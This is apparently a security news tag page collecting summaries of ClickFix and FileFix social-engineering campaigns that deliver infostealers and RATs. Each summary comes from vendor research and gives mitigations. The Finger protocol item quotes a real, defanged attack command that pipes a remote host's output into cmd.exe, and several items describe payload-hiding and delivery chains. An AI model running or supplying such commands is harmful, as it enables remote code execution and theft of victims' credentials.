All news with #clickfix tag

EVALUSION ClickFix Campaign Delivers Amatera, NetSupport

🔒 Researchers identified a ClickFix-based EVALUSION campaign deploying Amatera Stealer and NetSupport RAT, observed in November 2025. The campaign abuses the Windows Run dialog and mshta.exe to launch a PowerShell script that downloads a .NET DLL hosted on MediaFire; the Amatera DLL, packed with PureCrypter, is injected into MSBuild.exe to exfiltrate data. eSentire highlights Amatera's WoW64 SysCalls evasion and conditional NetSupport deployment when domain membership or valuable files are detected.

Decades-Old Finger Protocol Used to Deliver ClickFix Malware

🛡️ Researchers warn the decades-old Finger protocol is being repurposed in ClickFix-style campaigns to fetch remote commands and execute them on Windows systems. Attackers social-engineer victims into running batch commands such as finger root@finger.nateams[.]com | cmd, piping remote output directly into cmd.exe. Observed chains create randomly named folders, copy and rename curl.exe, download a ZIP disguised as a PDF, extract a Python malware package and launch it via pythonw.exe. Blocking outbound TCP port 79 is the primary mitigation to prevent systems from connecting to remote Finger daemons.

FileFix: New File Explorer Social-Engineering Threat

🔒 FileFix is a social‑engineering technique that tricks users into pasting a malicious command into the Windows File Explorer address bar instead of the Run dialog. Attackers hide a long payload before a benign-looking file path using leading spaces so only the harmless path is visible, then invoke a PowerShell script (for example via conhost.exe) to retrieve and run malware. Defenses emphasize robust endpoint protection and ongoing employee awareness training, since blocking shortcuts alone is insufficient.

Acronis on FileFix, SideWinder and Shadow Vector Campaigns

🔍 Acronis TRU describes practical VirusTotal hunting techniques used to track the FileFix ClickFix variant, the long-running SideWinder actor, and the Shadow Vector SVG campaign targeting Colombian users. Using Livehunt, content-based YARA rules, VT Diff, and metadata pivoting, analysts located clipboard-based web payloads, document exploits (CVE‑2017‑0199/11882), and judicial-themed SVG decoys. The post emphasizes iterative rule tuning, retrohunt for timelines, and infrastructure pivots that convert fragmented indicators into actionable intelligence.

ClickFix attacks add multi-OS support, videos, timers

🔒 ClickFix campaigns have evolved to include embedded video tutorials, an automated OS detector, and a countdown timer to pressure victims into executing pasted commands. Researchers at Push Security observed fake Cloudflare CAPTCHA pages that auto-copy malicious commands to the clipboard and adapt instructions for Windows, macOS, or Linux. Attackers promote these pages via malvertising, SEO poisoning, and compromised sites, then deliver varying payloads such as MSHTA executables and PowerShell scripts. Users are strongly advised never to paste and run terminal commands from unknown web prompts.

PhantomCaptcha ClickFix Attack Targets Ukraine Relief Orgs

🛡️ A one-day spearphishing campaign named PhantomCaptcha targeted Ukrainian regional government officials and multiple war-relief organizations on October 8, using malicious PDFs that linked to a fake Zoom domain and impersonated the President’s Office. According to SentinelLABS, the operation used a fake Cloudflare CAPTCHA to trick victims into copying and pasting a token into the Windows Command Prompt, which executed a PowerShell downloader and deployed a WebSocket RAT. The lightweight RAT provided remote command execution and data exfiltration capabilities, and researchers found follow-on activity delivering spyware-laced Android APKs to users in Lviv.

TikTok Videos Push Infostealers via ClickFix Activation Scams

🔒 Cybercriminals are using TikTok videos disguised as free activation guides for software such as Windows, Adobe, Spotify, and Discord to distribute info‑stealing malware via a ClickFix technique. The videos instruct users to run a short PowerShell command that fetches a script from slmgr.win, which then downloads a variant of Aura Stealer and an additional payload from Cloudflare Pages. Victims should assume credentials are compromised, reset passwords, and avoid running copied commands in shells or terminal windows.

Google Ads Promote Fake Homebrew, LogMeIn, TradingView Sites

🚨 Researchers uncovered a malvertising campaign that uses Google Ads to surface convincing fake Homebrew, LogMeIn, and TradingView download sites targeting macOS developers. The pages prompt victims to copy a curl command into Terminal, but the clipboard often contains a base64-encoded installer that decodes and runs an install.sh payload. That script removes quarantine flags, bypasses Gatekeeper, and delivers infostealers that check for analysis environments before executing. Operators deploy AMOS and Odyssey, which harvest browsers, wallets, and credentials; users are urged not to paste unknown commands into Terminal.

New FileFix Variant Uses Cache Smuggling to Evade Security

⚠️ A new FileFix variant uses cache smuggling to deliver a malicious ZIP via Chrome's disk cache while impersonating a Fortinet VPN Compliance Checker, tricking victims into pasting a crafted path into File Explorer. The embedded PowerShell command extracts a hidden ZIP from cached image files, writes a ComplianceChecker.zip and launches an executable, enabling execution without obvious downloads. Security firms report rapid abuse by ransomware and info-stealer operators and advise training users never to paste clipboard content into OS dialogs.

IUAM ClickFix Generator: Commoditizing Click-to-Run Phishing

🛡️ Unit 42 describes the IUAM ClickFix Generator, a phishing kit that automates creation of ClickFix-style pages which coerce victims into pasting and executing attacker-supplied commands. The kit creates OS-aware, highly customizable pages with clipboard injection, obfuscation, and mobile blocking to deliver infostealers and RATs such as DeerStealer and Odyssey. Unit 42 observed real campaigns, shared developer artifacts, and recommends user education and technical controls to block domains, IPs, and malware indicators.

Fake macOS apps on GitHub spread Atomic (AMOS) malware

⚠️ LastPass warns of a macOS campaign that uses fraudulent GitHub repositories to impersonate popular apps and trick users into running Terminal commands. The fake installers deliver the Atomic (AMOS) info‑stealer via a ClickFix workflow: a curl command decodes a base64 URL and downloads an install.sh payload to /tmp. Attackers rely on SEO and many disposable accounts to evade takedowns and boost search rankings. Users should only install macOS software from official vendor sites and avoid pasting unknown commands into Terminal.

Evolving ClickFix Variants Lead to MetaStealer Deployments

🔍 Huntress analysts observed an uptick in attacks that combine classic ClickFix social engineering with more advanced deployment techniques over the past fifteen business days. A fake AnyDesk installer used a Cloudflare Turnstile lure that opened Windows File Explorer via the search-ms protocol to deliver an LNK payload disguised as a PDF and install an MSI that dropped MetaStealer. Separately, operators deployed Cephalus ransomware using DLL sideloading through the legitimate SentinelOne host binary, illustrating evolving tradecraft that mixes manual user interaction and technical evasion.

FileFix Steganography Attack Drops StealC Infostealer

🛡️ A new FileFix campaign impersonates Meta support to trick users into pasting a disguised PowerShell command into the File Explorer address bar, which then downloads and executes malware. The attackers hide a second-stage script and encrypted binaries inside a seemingly benign JPG hosted on Bitbucket using steganography. The final payload is the StealC infostealer, designed to harvest browser credentials, messaging logins, crypto wallets, cloud keys and more. Security vendor Acronis observed multiple evolving variants over a two-week period and urges user education on these novel ClickFix/FileFix tactics.

Webinar: Securing the Modern Web Edge from Browser Threats

🔒 On September 29 at 12:00 PM ET, BleepingComputer and SC Media will host a live webinar featuring browser security experts from Push Security to examine how modern web browsers have become a primary enterprise attack surface. The session will cover malicious and shadow extensions, session token theft, OAuth abuse, and emerging ClickFix and FileFix techniques, plus mitigation strategies. Attendees will learn practical detection and response approaches to protect SaaS sessions, restore visibility at the web edge, and close gaps missed by traditional endpoint and identity controls.

ClickFix Campaign Delivers CORNFLAKE.V3 Backdoor via Web

🛡️ Mandiant observed a campaign using the ClickFix social‑engineering lure to trick victims into copying and running PowerShell commands via the Windows Run dialog, yielding initial access tracked as UNC5518. That access is monetized and used by other groups to deploy a versatile backdoor, CORNFLAKE.V3, in PHP and JavaScript forms. CORNFLAKE.V3 supports HTTP-based payload execution, Cloudflare-tunneled proxying and registry persistence; researchers recommend disabling Run where possible, tightening PowerShell policies and increasing logging and user training to mitigate the risk.